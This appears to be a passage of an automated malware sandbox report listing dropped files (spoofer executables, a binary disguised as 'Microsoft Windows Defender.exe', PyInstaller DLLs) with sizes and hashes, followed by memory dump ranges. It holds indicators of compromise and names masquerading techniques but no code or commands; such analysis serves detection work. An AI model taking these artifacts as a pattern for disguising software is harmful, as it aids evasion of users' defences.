SHA512
72f97e3b0aed86fffcaa04db2e0ad0a11581ae19db9463ff6365d5a22184064f4be1c7bba1506e6d8308f854bb8f0f4560a866183ee4c2cbfea8a3ce6de8a4a8

Download Submit
C:\Users\SubZ\PERMENANTSPOOFER.exe

Filesize
11KB

MD5
8de88d013af176f722fbffcf10129d70

SHA1
296d9e24e1bbad2100d243aaf7a5de48eb07771d

SHA256
69b3590ff99b73d630e9f35d6d60fcbe7d206b6152cbc94422f5144a726b370e

SHA512
06ed7381329e5617ae0e78df86d219286a9744cf140dcc3d0a87a52f6ec7d846d8be6336df3e0041128f8af81d6953b170b8b5c4b72966c8795d0e06f6954851

Download Submit
C:\Users\SubZ\PERMENANTSPOOFER.exe

Filesize
56KB

MD5
ff6e403559c2cb8ad49f71257fb35561

SHA1
e1537ff323012130e9d3e68baafa1b78c93caf20

SHA256
ba50f9399f9f06c341c89e0f0863084e2c11ce82e079edf089df7d3eff022e15

SHA512
4038e15ca639279cb366ca198c4bfe7a19794a87eb8c80f2c2d712290700d3e6e7a6a000080de070d4470c9485efbf8ec1b5528066319ed456d5526ad7b7dadb

Download Submit
C:\Windows\SysWOW64\WindowsInput.InstallLog

Filesize
224B

MD5
e469dda91ae810a1f94c96060f3f8a65

SHA1
0b4b3b0f6f937016b1e045ce5313ee2a65a38630

SHA256
d42fee8db8eb0e047ca53ad59b1c9bc69fe04993be36fec502e3532371908842

SHA512
2eb4037361c03e195c642a53f55a3182a6df19903db503060e366f2394750e64ae04fdaace61ef5a6dba649defc88322d78edd2928bc53ebd1ce11d68cc88dac

Download Submit
C:\Windows\SysWOW64\WindowsInput.InstallLog

Filesize
597B

MD5
c2291863df7c2d3038ce3c22fa276506

SHA1
7b7d2bc07a6c35523807342c747c9b6a19f3184e

SHA256
14504199bede3f46129969dbd2b7680f2e5b7fcd73a3e427ce1bb6217a6d13da

SHA512
00bf40174a67e3e663d18a887c5b461a1e5ead0b27f0a139d87969158c58f4ca72cfa5a731dda239356192ca4cb5ac6ae2b0e37401d534e686cabacd3cbee8fa

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
20KB

MD5
0f546756a281e74813b1991bbe0df5d5

SHA1
3fc5246f7b1cd213be65ba0fc17186f5484d59b1

SHA256
a36ea1ffaa0cc50401f068ee142d3470ca8ae54986d02e108bf6bccb3ed097b4

SHA512
b6ea2b9941faa60ec150782cd8ca020d973a8ccddfa551049c0f6954e32ff9000290e7e0b1ba4a6a5235a8b4d8239c8eba49f3c5fc9ea9e7e17243d86dc58b27

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe

Filesize
21KB

MD5
e854a4636afc652b320e12e50ba4080e

SHA1
8a4ac6ecc22ee5f3a8ec846d38b41ff18c641fdc

SHA256
94b9c78c6fa2bf61fba20a08ad4563f7dd2f5668c28eff227965ce0a2032d5d5

SHA512
30aabd5079b6ed0948eb70fd18e9166096e4ba5d1d47fc35b7270f931d19bbe6cd929b6010f70297bf5272dc5a79e2523721354d211c4080d68ad8d17e316118

Download Submit
\Users\Admin\AppData\Local\Temp\DRIVER.EXE

Filesize
111KB

MD5
51ae04a1f94c43bc3cdbe57ab789b955

SHA1
c73cd0cc75fd0ad05d6ac2c2651899ae47fd2c0c

SHA256
8e539cc20073dd335eb195c56dae58c43e69b813a984f2fa76421a0880da5c1d

SHA512
e566e3ad4bc43e46fb005458c68472627fd9b2dca5c69808017203519b22d7991cdc90d4e2ca7d3f7f57c1b52188959cda1109300bfb79875ee5a1f5b477a8ee

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
196KB

MD5
8f80ecc9bf83034ba759581d00c82016

SHA1
b6ea16475601699d03e6eb799473225197ec6baa

SHA256
cd59cd6ac2043423c0fea60869168e1479fd4c62b4d9109770679ebf0f022b99

SHA512
b55631038c532c0f13c1ca297cfab79d80d66ce0236e9abddadfc063fc6c2efce91db6591cf2d270a3c8126ff6fe05fcc9ffcd78c93c69f87dff4805e29a990c

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
45KB

MD5
67b9028552e4b57d6bdd19881b25c487

SHA1
24140a4bffb78c702dcf9f52e7c55fb2c09f8ba1

SHA256
b38ab90a0e0d852b5be763d5424c0941be93e8c0665acdf00b6ec5389b313e17

SHA512
755e98fbf2f1d120be4ebefbd171ef9a9fafaed884305fdd2a7f4faa14f87ca6599711c76faca9a42b0d557de0388e89fea4f65d0fd54c68afec713d959ca774

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
742KB

MD5
97a2335ae0f9089f646568162eae1745

SHA1
95eada74ee2601dfc5d731fb6915ecd4f23dcdc1

SHA256
d4166407ead0306ca46ffe073e62f5292acdf452929b3f6397b69ffec5a941ec

SHA512
f10da5713943a99a56942dee3689e15f7174d5233d903ea4dd679515d4379558815693ccf0c6640bbddf30d97cc6f0ed0eb4e2958155a48ed310d014d62599a1

Download Submit
\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
55KB

MD5
46ba058320cc7eac57404e4eb4b85baa

SHA1
9aa5a95b12c5e602f44dacbf3ccdb6e61d9f68c5

SHA256
806a37af395f0ee141f578df07ec4b441a94bd18ae483799c323c78f72ec5c4d

SHA512
1ddfe6309559156a30580cfe269a80b5884ad509ecf47165bee768913cd29c5513121c4c029dc531d232094b5995e9be9842267467ed2df731c6f06430169413

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
64KB

MD5
a977edb476f1de491ada9f87104549f2

SHA1
a0b3b5f9110a0a30884c4fe52628c51766574d24

SHA256
3f27b99eb6a69acd93994f959dc2831833e85be26302538f31709af29c9781b1

SHA512
89d49a158dfa49776e3fd3c3d96fc0f40264aab1d8fc6d5abbdc14e9ec669754eebc1dae48edaec69453a3ecb6fa80e8ed76c5ac6622b378e2c50dcc74fadca3

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
15KB

MD5
c8f897206063b82bd5ab3d8f1e0ad863

SHA1
726083a0d0cf86d86d773b2bf275cbed4caf35ba

SHA256
35e315f14a968e8d6b4496efcfcdc846a80f0530b96ebe480f8b092dbfbd0a09

SHA512
110cf004c2257991183c8d6b46d3e6786bf9b695788f3133bb0a99b37fe00a718875c890a94315f14c59b63a95b48ddc2836ae346d161b7f17b0e29d51f3f3fe

Download Submit
\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
146KB

MD5
8051e449fc63188322d83ecd5cc64b62

SHA1
1431949f7b977ea7e716d9125b9060e8bb5e275b

SHA256
bf1d5dfaa1904665ebc4c3db35966b35cfb1b2525a758e103b972c77a0d0f825

SHA512
856e791a5967d45cc332714ac196e878bf2bcb578b159244d89116d60aa65bdab551a41b1f6a3735e53aa96144e6841e12b802845308df56126af730396b31b9

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI22002\api-ms-win-core-file-l1-2-0.dll

Filesize
21KB

MD5
bcb8b9f6606d4094270b6d9b2ed92139

SHA1
bd55e985db649eadcb444857beed397362a2ba7b

SHA256
fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

SHA512
869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI22002\api-ms-win-core-file-l2-1-0.dll

Filesize
18KB

MD5
bfffa7117fd9b1622c66d949bac3f1d7

SHA1
402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

SHA256
1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

SHA512
b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI22002\api-ms-win-core-localization-l1-2-0.dll

Filesize
21KB

MD5
20ddf543a1abe7aee845de1ec1d3aa8e

SHA1
0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

SHA256
d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

SHA512
96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI22002\python312.dll

Filesize
86KB

MD5
7f2970855f767b9295afe3fd08348920

SHA1
2acea82e166a42878450af11ccc9913d6ea9fb75

SHA256
341dfc3b987984eb34748b26fd3032f7855cb977bbc8191f0cd859cc0751e84f

SHA512
bd67a61b0e465746b6b7dc03bcc9a4ae2e94402847f6bc7301aac7a8f30bbba42e9e7bf4be3d1c66ec7fd97158955a772bf3603298c500fd675400edcf7c9df0

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI22002\ucrtbase.dll

Filesize
77KB

MD5
b9760e0f060eba96951a32066135796a

SHA1
8ac234e061ea8897f5476e3307f2574b00b82d0c

SHA256
51d292c3883dee5fb1a1eb342720249cb94772c771545d16e4beba84d0e91dab

SHA512
a280e848ce9d32f192ce09af078ac0e7921e0f6e70469f9fd4278d82fa063363772c70f1dd37ec77b2a6759550ba07116f256afe8e2fc43d12b766360f7d7fbc

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
46KB

MD5
3f1ea2796b7ffdafae36e229fa4d94a9

SHA1
d74130513c601afd8745c282f3345a26366910c5

SHA256
fc1b318b6319c84d4a1dec03cc276c937e0889b0a7131cccdf541d0e5df599a4

SHA512
ce58726cc9e6ab808864f436975aff4890559a9963626beea24c65070825e01320a612c832c8bd950fc58f50561182a268d7c28aac27d420f96aad427e8a8e1f

Download Submit
memory/1648-134-0x0000000000AA0000-0x0000000000B20000-memory.dmp

Filesize
512KB

Download
memory/1648-151-0x000007FEED4B0000-0x000007FEEDE4D000-memory.dmp

Filesize
9.6MB

Download
memory/1648-136-0x000007FEED4B0000-0x000007FEEDE4D000-memory.dmp

Filesize
9.6MB

Download
memory/1648-133-0x000007FEED4B0000-0x000007FEEDE4D000-memory.dmp

Filesize
9.6MB

Download
memory/1916-258-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
memory/1916-174-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
memory/1916-257-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/1916-172-0x00000000002F0000-0x0000000000312000-memory.dmp

Filesize
136KB

Download
memory/1916-173-0x000007FEF57D0000-0x000007FEF61BC000-memory.dmp

Filesize
9.9MB

Download
memory/2056-25-0x00000000002C0000-0x00000000002E2000-memory.dmp

Filesize
136KB

Download
memory/2056-54-0x000000001AF60000-0x000000001AFE0000-memory.dmp

Filesize
512KB

Download
memory/2056-50-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp

Filesize
9.9MB

Download
memory/2056-157-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp

Filesize
9.9MB

Download
memory/2752-111-0x000007FEEF960000-0x000007FEF0038000-memory.dmp

Filesize
6.8MB

Download
memory/2760-166-0x0000000000C80000-0x0000000000D5A000-memory.dmp

Filesize
872KB

Download
memory/2760-256-0x0000000004CC0000-0x0000000004D00000-memory.dmp

Filesize
256KB

Download
memory/2760-255-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download
memory/2760-167-0x0000000004CC0000-0x0000000004D00000-memory.dmp

Filesize
256KB

Download
memory/2760-168-0x0000000000BD0000-0x0000000000BE0000-memory.dmp

Filesize
64KB

Download
memory/2760-164-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download
memory/2880-198-0x0000000077630000-0x00000000777D9000-memory.dmp

Filesize
1.7MB

Download
memory/2880-199-0x0000000077630000-0x00000000777D9000-memory.dmp

Filesize
1.7MB

Download
memory/2880-92-0x000000013F230000-0x000000013FB8C000-memory.dmp

Filesize
9.4MB

Download
memory/2964-154-0x00000000047A0000-0x00000000047EE000-memory.dmp

Filesize
312KB

Download
memory/2964-60-0x0000000000BD0000-0x0000000000CAA000-memory.dmp

Filesize
872KB

Download
memory/2964-113-0x00000000046A0000-0x00000000046EC000-memory.dmp

Filesize
304KB

Download
memory/2964-112-0x00000000047F0000-0x0000000004830000-memory.dmp

Filesize
256KB

Download
memory/2964-110-0x0000000000340000-0x000000000034A000-memory.dmp

Filesize
40KB

Download
memory/2964-165-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download
memory/2964-114-0x0000000000490000-0x0000000000498000-memory.dmp

Filesize
32KB

Download
memory/2964-116-0x00000000006C0000-0x00000000006CC000-memory.dmp

Filesize
48KB

Download
memory/2964-109-0x0000000074870000-0x0000000074F5E000-memory.dmp

Filesize
6.9MB

Download
memory/2964-115-0x00000000006B0000-0x00000000006B8000-memory.dmp

Filesize
32KB

Download